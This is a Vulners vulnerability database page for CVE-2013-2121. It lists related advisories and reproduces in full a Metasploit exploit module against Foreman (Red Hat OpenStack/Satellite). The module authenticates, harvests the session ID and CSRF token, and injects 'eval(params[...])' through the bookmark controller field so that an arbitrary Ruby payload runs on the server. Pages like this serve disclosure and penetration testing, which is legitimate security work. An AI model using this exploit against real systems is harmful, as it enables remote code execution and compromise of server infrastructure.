Vulners
Lucene search
Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection
🗓️ 16 Jul 2013 15:07:31Reported by Ramon de C Valle <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 27 Views
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Foreman (Red Hat OpenStack/Satellite) Code Injection Vulnerability | 23 Jul 201300:00 | – | zdt |
 | CVE-2013-2121 | 23 Jul 201300:00 | – | circl |
 | Foreman Red Hat OpenStack bookmarks Code Injection (CVE-2013-2121) | 6 Oct 201300:00 | – | checkpoint_advisories |
 | CVE-2013-2121 | 31 Jul 201310:00 | – | cve |
 | CVE-2013-2121 | 31 Jul 201310:00 | – | cvelist |
 | Foreman (RedHat OpenStack/Satellite) - bookmarks/create Code Injection (Metasploit) | 23 Jul 201300:00 | – | exploitdb |
 | CVE-2013-2121 | 31 Jul 201313:20 | – | nvd |
 | RHEA-2014:1175 Red Hat Enhancement Advisory: Release of Satellite 6.0 | 15 Sep 202421:58 | – | osv |
| RHSA-2013:0995 Red Hat Security Advisory: Foreman security and bug fix update | 15 Sep 202420:55 | – | osv |
 | Foreman (Red Hat OpenStack/Satellite) Code Injection | 23 Jul 201300:00 | – | packetstorm |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',
'Description' => %q{
This module exploits a code injection vulnerability in the 'create'
action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite
(Foreman 1.2.0-RC1 and earlier).
},
'Author' => 'Ramon de C Valle',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-2121'],
['CWE', '95'],
['OSVDB', '94671'],
['BID', '60833'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],
['URL', 'http://projects.theforeman.org/issues/2631']
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' =>
[
['Automatic', {}]
],
'DisclosureDate' => 'Jun 6 2013',
'DefaultOptions' => { 'PrependFork' => true },
'DefaultTarget' => 0
)
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Your username', 'admin']),
OptString.new('PASSWORD', [true, 'Your password', 'changeme']),
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
], self.class
)
end
def exploit
print_status("Logging into #{target_url}...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
'vars_post' => {
'login[login]' => datastore['USERNAME'],
'login[password]' => datastore['PASSWORD']
}
)
fail_with(Failure::Unknown, 'No response from remote host') if res.nil?
if res.headers['Location'] =~ /users\/login$/
fail_with(Failure::NoAccess, 'Authentication failed')
else
session = $1 if res.get_cookies =~ /_session_id=([0-9a-f]*)/
fail_with(Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?
end
print_status('Retrieving the CSRF token for this session...')
res = send_request_cgi(
'cookie' => "_session_id=#{session}",
'method' => 'GET',
'uri' => normalize_uri(target_uri)
)
fail_with(Failure::Unknown, 'No response from remote host') if res.nil?
if res.headers['Location'] =~ /users\/login$/
fail_with(Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')
else
csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]*\/?>/i
csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]*\/?>/i
if csrf_param.nil? || csrf_token.nil?
csrf_param = $1 if res.body =~ /<meta[ ]+name="csrf-param"[ ]+content="(.*)"[ ]*\/?>/i
csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(.*)"[ ]*\/?>/i
end
fail_with(Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?
end
payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)
print_status("Sending create-bookmark request to #{target_url('bookmarks')}...")
res = send_request_cgi(
'cookie' => "_session_id=#{session}",
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'bookmarks'),
'vars_post' => {
csrf_param => csrf_token,
payload_param => payload.encoded,
'bookmark[controller]' => "eval(params[:#{payload_param}])#",
'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3),
'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3)
}
)
end
def target_url(*args)
(ssl ? 'https' : 'http') +
if rport.to_i == 80 || rport.to_i == 443
"://#{vhost}"
else
"://#{vhost}:#{rport}"
end + normalize_uri(target_uri.path, *args)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jul 2017 13:26Current
7.5High risk
Vulners AI Score7.5
CVSS 26
EPSS0.60925